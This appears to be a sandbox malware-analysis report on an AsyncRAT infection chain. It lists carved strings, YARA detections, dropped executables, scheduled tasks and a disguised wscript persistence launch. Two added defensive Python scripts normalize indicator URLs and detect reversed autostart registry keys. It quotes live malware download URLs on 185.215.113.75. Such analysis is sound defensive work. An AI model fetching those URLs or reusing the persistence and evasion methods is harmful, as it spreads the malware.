Source: powershell.exe, 00000034.00000002.2493401287.0000000005191000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2303310249.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2985894867.0000024E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB74D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.2985894867.0000024E01617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8CBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000034.00000002.2493401287.0000000005191000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000010.00000002.3262815435.0000024E79FDF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.G-
Source: powershell.exe, 00000010.00000002.2985894867.0000024E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB74D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.2303310249.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.0000000004B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000034.00000002.2493401287.0000000005191000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000010.00000002.2985894867.0000024E01257000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.000000000514D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB82BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000D.00000002.2313941382.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2985894867.0000024E018DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3203675896.0000024E101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3203675896.0000024E1007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2461048730.0000000005BA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3215739124.0000019EC754D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3215739124.0000019EC7683000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000010.00000002.2985894867.0000024E01617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8CBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000010.00000002.2985894867.0000024E01617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8CBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
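The string hits above are carved from process memory, so many of them carry bytes that merely sat next to the URL in memory: the "J", "f", "Z0123456789", "uNko/index.php" and "shqos.dll" tails on the 185.215.113.75 download URLs, the "0E"/"0A"/"0C"/"0X" after the DigiCert URLs (almost certainly the DER tag byte 0x30, "0", and length byte of the next certificate element, since those URLs live inside the Authenticode certificate embedded in skotes.exe), and the truncated "https://go.micro" and "http://www.microsoft.G-". Before any of this goes on a blocklist it has to be normalized and the library noise (DigiCert, NuGet, Pester, protobuf-net, stackoverflow comments) separated from the actual download server. The script below is an added example, not part of the Joe Sandbox report; the trimming rules, the TLD list, the benign-host list and the sample lines (a subset of the report's own hits with the long memory-region identifiers replaced by "...") are its own assumptions, and it generalizes beyond the exact tails seen here to any trailing bytes after a known file extension or hostname suffix:

```python
"""Normalize 'String found in binary or memory' hits into a clean IOC list.
Memory-carved strings often carry trailing bytes from adjacent memory, so the
raw strings must be trimmed before they are used for blocking or hunting."""
import re
from urllib.parse import urlsplit

# Sample input: constructed from a subset of the report's own lines, with the
# memory-region identifiers shortened to '...' to keep the sample readable.
REPORT_LINES = """\
Source: skotes.exe, ... String found in binary or memory: http://185.215.113.75/fae1dac8d9ea1e2feb1d830c7161aeb0bb614131d05d7ea
Source: skotes.exe, ... String found in binary or memory: http://185.215.113.75/files/1453454495/Fe36XBk.exeJ
Source: skotes.exe, ... String found in binary or memory: http://185.215.113.75/files/1453454495/Fe36XBk.exef
Source: skotes.exe, ... String found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exeZ0123456789
Source: skotes.exe, ... String found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exeuNko/index.php
Source: skotes.exe, ... String found in binary or memory: http://185.215.113.75/files/748049926/k6Sly2p.exeshqos.dll
Source: skotes.exe, ... String found in binary or memory: http://185.215.113.75/files/none/random.exeB:
Source: skotes.exe, ... String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: skotes.exe, ... String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, ... String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, ... String found in binary or memory: https://go.micro
Source: powershell.exe, ... String found in binary or memory: http://www.microsoft.G-
"""

HIT_MARKER = "String found in binary or memory: "
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Cut a URL at the first file extension a downloader would fetch; anything
# after it is carve noise. The extension list is an assumption.
FILE_EXT = re.compile(r"^(https?://\S+?\.(?:exe|dll|crt|crl|php))(.*)$", re.I)
# Trim a hostname at its last plausible public suffix (greedy, so 'x.comet.org'
# keeps '.org'). The suffix list is an assumption sized for this report.
HOST_TLD = re.compile(r"^(.+\.(?:com|org|net|ms|io))(.*)$", re.I)
# Library/OS metadata hosts seen in this report (certificate URLs from the
# signed payload, PowerShell/NuGet module strings). Assumed benign.
BENIGN_SUFFIXES = ("digicert.com", "nuget.org", "oneget.org", "microsoft.com",
                   "aka.ms", "github.com", "stackoverflow.com", "apache.org",
                   "contoso.com", "pesterbdd.com", "xmlsoap.org", "sf.net")


def normalize(url):
    """Return (clean_url, stripped_noise, category) for one carved URL string."""
    noise = ""
    m = FILE_EXT.match(url)
    if m:
        url, noise = m.group(1), m.group(2)
    parts = urlsplit(url)
    host, path = parts.netloc, parts.path
    if IPV4.match(host):
        # Bare-IP server: the full path is the download IOC, the IP the host IOC.
        return url, noise, "download" if path else "host"
    t = HOST_TLD.match(host)
    if not t:
        return url, noise, "unknown"  # truncated or garbled: review by hand
    host, host_noise = t.group(1), t.group(2)
    url = f"{parts.scheme}://{host}{path}"
    noise = host_noise + noise
    cat = "benign" if host.lower().endswith(BENIGN_SUFFIXES) else "unknown"
    return url, noise, cat


def extract_iocs(report_text):
    """Parse report lines, normalize each URL and bucket it by category.
    Returns (buckets, noise_seen) where noise_seen maps raw string -> tail."""
    buckets = {"download": set(), "host": set(), "benign": set(), "unknown": set()}
    noise_seen = {}
    for line in report_text.splitlines():
        if HIT_MARKER not in line:
            continue
        raw = line.split(HIT_MARKER, 1)[1].strip()
        clean, noise, cat = normalize(raw)
        buckets[cat].add(clean)
        if noise:
            noise_seen[raw] = noise
    return buckets, noise_seen


if __name__ == "__main__":
    buckets, noise = extract_iocs(REPORT_LINES)
    for cat, urls in buckets.items():
        print(f"[{cat}]")
        for u in sorted(urls):
            print("   ", u)
    print(f"{len(noise)} strings had carve noise stripped")
```

Everything in the "unknown" bucket still needs a human: "go.micro" is a valid-looking hostname that is really a truncated Microsoft link, and no regex can tell that apart from a genuine short domain.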

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 8_2_00F8EAFF
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_00F8ED6A
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 8_2_00F8EAFF
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 8_2_00F7AA57
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00FA9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 8_2_00FA9576

System Summary

Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000003F.00000002.2927763179.000000000A17E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
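The ditekSHen rule matched above is named for one specific evasion: the AsyncRAT payload stores its autostart registry paths reversed ("nuR\noisreVtnerruC\...") so that a plain strings scan or a forward-looking YARA string never sees "CurrentVersion\Run". The scanner below is an added example that reimplements that idea, not the YARA rule itself: it carves printable ASCII and UTF-16LE runs from a buffer, reverses each one and checks both directions against a short list of autostart key paths. The key list is a subset chosen for the example, and the sample buffer is constructed here rather than taken from the Macromedia.com memory dumps.

```python
"""Find autostart (ASEP) registry key paths stored forward or reversed in a
binary blob, in both ASCII and UTF-16LE. Added example, not the YARA rule."""
import re

# Autostart key paths to look for (assumption: a small subset; extend as needed).
ASEP_KEYS = (
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\runonce",
    r"software\microsoft\windows\currentversion\policies\explorer\run",
    r"software\microsoft\windows nt\currentversion\winlogon",
)
# Longest first, so a RunOnce string is reported once, not also as Run.
KEYS_LONGEST_FIRST = sorted(ASEP_KEYS, key=len, reverse=True)
MIN_LEN = 8
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)


def _candidates(buf):
    """Yield (offset, encoding, text) for every printable ASCII/UTF-16LE run."""
    for m in ASCII_RUN.finditer(buf):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16_RUN.finditer(buf):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


def find_asep_strings(buf):
    """Return hits as (offset, encoding, 'forward'|'reversed', key).
    Each carved string is compared case-insensitively as-is and reversed."""
    hits = []
    for off, enc, text in _candidates(buf):
        low = text.lower()
        for direction, s in (("forward", low), ("reversed", low[::-1])):
            key = next((k for k in KEYS_LONGEST_FIRST if k in s), None)
            if key:
                hits.append((off, enc, direction, key))
    return hits


def build_sample():
    """Constructed sample buffer (not from the real sample): junk bytes, a
    forward Run key, a reversed ASCII Run key, a reversed UTF-16LE RunOnce key."""
    run = r"Software\Microsoft\Windows\CurrentVersion\Run"
    runonce = run + "Once"
    return (b"\x00" * 16
            + b"MZ\x90\x00" + b"\x00" * 12
            + run.encode("ascii") + b"\x00" * 8
            + run[::-1].encode("ascii") + b"\x00" * 8
            + runonce[::-1].encode("utf-16le") + b"\x00" * 8)


if __name__ == "__main__":
    for off, enc, direction, key in find_asep_strings(build_sample()):
        print(f"0x{off:04x} {enc:9} {direction:8} {key}")
```

Run it over an unpacked .NET payload (the 57.2.Macromedia.com.*.unpack artifacts listed above, once exported) rather than the packed dropper: the reversed strings only exist in the decrypted stage, which is also why the rule fires on UNPACKEDPE and MEMORY sources and not on the file on disk.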
Source: afccf6841f.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: afccf6841f.exe, 00000008.00000002.2268922496.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_832b1b15-7
Source: afccf6841f.exe, 00000008.00000002.2268922496.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_c513f5b7-5
Source: afccf6841f.exe, 0000002F.00000002.2455123932.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_3bab46f3-5
Source: afccf6841f.exe, 0000002F.00000002.2455123932.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_1c8ae419-0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe File created: C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Temp\v468GkyBl.hta
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe File created: C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta
Source: C:\Windows\System32\cmd.exe File created: C:\Temp\i2GY6vn5L.hta
Source: DhqvS8pXj8.exe Static PE information: section name:
Source: DhqvS8pXj8.exe Static PE information: section name: .idata
Source: DhqvS8pXj8.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[2].exe1.6.dr Static PE information: section name:
Source: random[2].exe1.6.dr Static PE information: section name: .idata
Source: random[2].exe1.6.dr Static PE information: section name:
Source: d895046020.exe.6.dr Static PE information: section name:
Source: d895046020.exe.6.dr Static PE information: section name: .idata
Source: d895046020.exe.6.dr Static PE information: section name:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Jump to dropped file
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F7D5EB: CreateFileW,DeviceIoControl,CloseHandle, 8_2_00F7D5EB
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 8_2_00F71201
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 8_2_00F7E8F6
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Code function: 30_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx, 30_2_004038AF
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe File created: C:\Windows\SchedulesAb
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe File created: C:\Windows\ContainsBefore
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe File created: C:\Windows\TokenDetroit
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe File created: C:\Windows\AttacksContacted
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe File created: C:\Windows\Tasks\Test Task17.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_008EE530 6_2_008EE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009278BB 6_2_009278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00927049 6_2_00927049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00928860 6_2_00928860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009231A8 6_2_009231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_008E4DE0 6_2_008E4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00922D10 6_2_00922D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0092779B 6_2_0092779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00917F36 6_2_00917F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_008E4B30 6_2_008E4B30
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027BD1A8 7_2_027BD1A8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_049354FE 7_2_049354FE
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_04933410 7_2_04933410
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_0493CCC8 7_2_0493CCC8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_0493AF28 7_2_0493AF28
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_049331C4 7_2_049331C4
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_049343D8 7_2_049343D8
